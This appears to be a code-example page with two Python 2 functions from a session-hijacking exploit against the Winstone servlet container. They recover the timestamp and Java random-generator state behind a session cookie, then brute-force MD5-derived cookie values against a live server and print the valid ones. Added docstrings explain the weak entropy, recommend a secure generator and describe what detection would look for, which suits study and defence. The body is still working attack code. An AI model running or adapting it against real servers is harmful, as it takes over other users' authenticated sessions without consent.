Ejemplo n.º 1
def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str):
    """Rebuild candidate session cookies from recorded parameters and test them.

    Each line of ``sessionsFileName`` is expected to hold five comma-separated
    fields: cookie name, lower and upper bound of a millisecond time window,
    a PRNG seed and the number of sessions to look for.  For every millisecond
    in the window the function computes
    ``md5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + PRNGout)``
    and passes the resulting cookie to ``isCookieValid``.

    Security note: every input to that digest is either observable (address,
    port, approximate time) or reproducible from the seed, so an identifier
    built this way carries no secret entropy.  Session identifiers should
    come from a cryptographically secure generator instead; on the server
    side, a burst of requests from one client that differ only in the
    session-cookie value is the pattern this kind of enumeration produces.

    Args:
        url: Passed unchanged to ``isCookieValid``.
        IPAddr: Address component of the hashed string; must be a ``str``
            because it is concatenated directly.
        serverPort: Port component of the hashed string; also a ``str``.
        sessionsFileName: Path of the parameter file described above.
        success_str: Passed unchanged to ``isCookieValid``.

    Returns:
        None.  Matching cookies are only printed.
    """
    # NOTE(review): the handle is never closed; a `with` block would release it.
    f = open(sessionsFileName,"r")
    while True:
        # The newline is stripped first, so a blank line inside the file ends
        # processing just like end-of-file does.
        line = f.readline().replace("\n","")
        if line == "":
            break

        # A line with any other number of fields raises ValueError here.
        (cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt) = line.split(",")

        timeMillisMin = int(timeMillisMin)
        timeMillisMax = int(timeMillisMax)
        PRNGseed = int(PRNGseed)
        sessionCnt = int(sessionCnt)
        
        # `seek` is how many generator outputs to draw before hashing; it only
        # advances after a cookie has been accepted.
        seek = 1
        for tryMillis in range(timeMillisMin,timeMillisMax):
            if seek > sessionCnt:
                break

            # Re-seed on every attempt and step forward `seek` times, keeping
            # only the last output.
            # presumably JavaLCGMimic reproduces java.util.Random - confirm
            # against its definition, which is not part of this listing.
            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            for i in range(seek):
                PRNGout = g.nextLong()

            # Python 2 semantics: update() is given a str here; Python 3
            # requires bytes.
            md5dig = hashlib.md5()
            md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(tryMillis)+str(PRNGout))

            cookieToTry = md5dig.hexdigest()

            # isCookieValid is defined elsewhere; from this call it takes the
            # URL, a "name=value" cookie string and the success marker.
            if isCookieValid(url,cookieName+"="+cookieToTry,success_str):
                print "[!!!] Found valid cookie:",cookieName+"="+cookieToTry
                seek += 1
Ejemplo n.º 2
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone):
        """Find the timestamp and PRNG position that reproduce a fresh cookie.

        Obtains one cookie through ``givemecookie``, then searches for the
        millisecond value and number of generator steps for which
        ``md5("Winstone_" + IPAddr + "_" + serverPort + "_" + millis + PRNGout)``
        equals the cookie value.

        Security note: the search space is bounded by ``PRNGseekMax`` and a
        window of ``timeMillisDelay + 1000`` milliseconds, which shows how
        little uncertainty an identifier derived from time and a seeded
        linear generator contains.  Identifiers drawn from a cryptographically
        secure generator do not have this property.

        Args:
            url: Passed unchanged to ``givemecookie``.
            PRNGseed: Seed handed to ``JavaLCGMimic.forceSeed``.
            IPAddr: Address component of the hashed string (``str``).
            serverPort: Port component of the hashed string (``str``).
            timezone: Zone name accepted by ``pytz.timezone``.

        Returns:
            ``(timeMillis, g.seed, PRNGseek)`` for the first match, or None
            when ``givemecookie`` returns None or no combination matches.
        """
        # NOTE(review): CookieName is declared global but never read or
        # written in this function.
        global CookieName
        global PRNGseekMax
        global timeMillisDelay
        
        t = givemecookie(url)

        if t == None:

            return

        # t[0] is treated as a "name=value" string, t[-1] as a timestamp in
        # HTTP-date layout.
        # presumably the Set-Cookie and Date response headers - confirm in
        # givemecookie, which is not part of this listing.
        cookie = t[0].split('=')[-1]
        st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z')
        # NOTE(review): time.mktime() interprets its argument as local time,
        # so the value derived below depends on the time zone of the machine
        # running this code as well as on `timezone` - confirm that is intended.
        dt = datetime.fromtimestamp(time.mktime(st))
        dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone))
        
        timeSecs = int(time.mktime(dt.timetuple()))

        # Outer search: number of generator outputs consumed before the one
        # used in the cookie, from 1 up to PRNGseekMax.
        PRNGseek = 1
        while True:
            if PRNGseek > PRNGseekMax:
                break

            # Restart from the seed every round and keep the PRNGseek-th output.
            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            
            PRNGout = -1
            for s in range(PRNGseek):
                PRNGout = g.nextLong()

            # Inner search: every millisecond from timeMillisDelay before the
            # parsed second up to the end of that second.
            for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000):
                # Python 2 semantics: update() is given a str here; Python 3
                # requires bytes.
                md5dig = hashlib.md5()
                md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
                
                if md5dig.hexdigest() == cookie:
                    print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek
                    # g.seed is the generator state after the PRNGseek steps above.
                    return (timeMillis,g.seed,PRNGseek)

            PRNGseek += 1